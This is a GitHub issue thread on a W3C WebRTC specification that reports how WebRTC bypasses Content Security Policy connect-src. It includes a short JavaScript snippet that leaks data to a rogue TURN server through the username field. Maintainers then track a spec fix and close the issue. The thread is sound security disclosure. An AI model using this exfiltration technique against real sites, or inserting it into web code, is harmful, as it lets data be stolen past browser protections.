Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

WebRTC bypass CSP connect-src policies #35

Closed
murillo128 opened this issue Jan 9, 2018 · 4 comments
Closed

WebRTC bypass CSP connect-src policies #35

murillo128 opened this issue Jan 9, 2018 · 4 comments
Assignees
@alvestrand
Labels
PR exists

Comments

@murillo128
Copy link

murillo128 commented Jan 9, 2018
edited by aboba
Loading

As explained in here: w3c/webappsec-csp#92 WebRTC bypass the CSP security policies for connect-src and a malicious script could use webrtc to leak data to a rogue server.

Note that it is not even needed to use datachannels at all, as you could leak data (at low rate) to a specially crafted TURN server on the username:

var pc = new RTCPeerConnection({"iceServers":[{"urls":["turn:74.125.140.127:19305?transport=udp"],"username":"_all_your_data_belongs_to_us","credential":"."}]});
pc.createOffer().then((sdp)=>pc.setLocalDescription(sdp);

IMHO this should be covered at the CSP spec, but we should add a warning at the security and privacy section of the webrtc spec until this is solved.
@alvestrand
Copy link
Contributor

Pull request on CSP spec: w3c/webappsec-csp#287

@alvestrand alvestrand self-assigned this Jan 18, 2018
@henbos
Copy link

henbos commented Aug 22, 2018

What's the status here?

@alvestrand
Copy link
Contributor

Since this is a new feature, and we've stopped adding new features, I'm moving this to the NV repo.

@alvestrand alvestrand transferred this issue from w3c/webrtc-pc Jul 4, 2019
aboba added a commit that referenced this issue Jul 15, 2019
@aboba
Add CSP support requirement
125165b 
Fix for Issues #35 and #36.
@aboba aboba mentioned this issue Jul 15, 2019
Merged
@aboba
Copy link
Collaborator

aboba commented Aug 27, 2019

With merger of PR 38, closing this issue.

@aboba aboba closed this as completed Aug 27, 2019
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Assignees

@alvestrand alvestrand

Labels
PR exists
Projects
None yet
Milestone
No milestone
Development

No branches or pull requests
4 participants
@alvestrand @aboba @murillo128 @henbos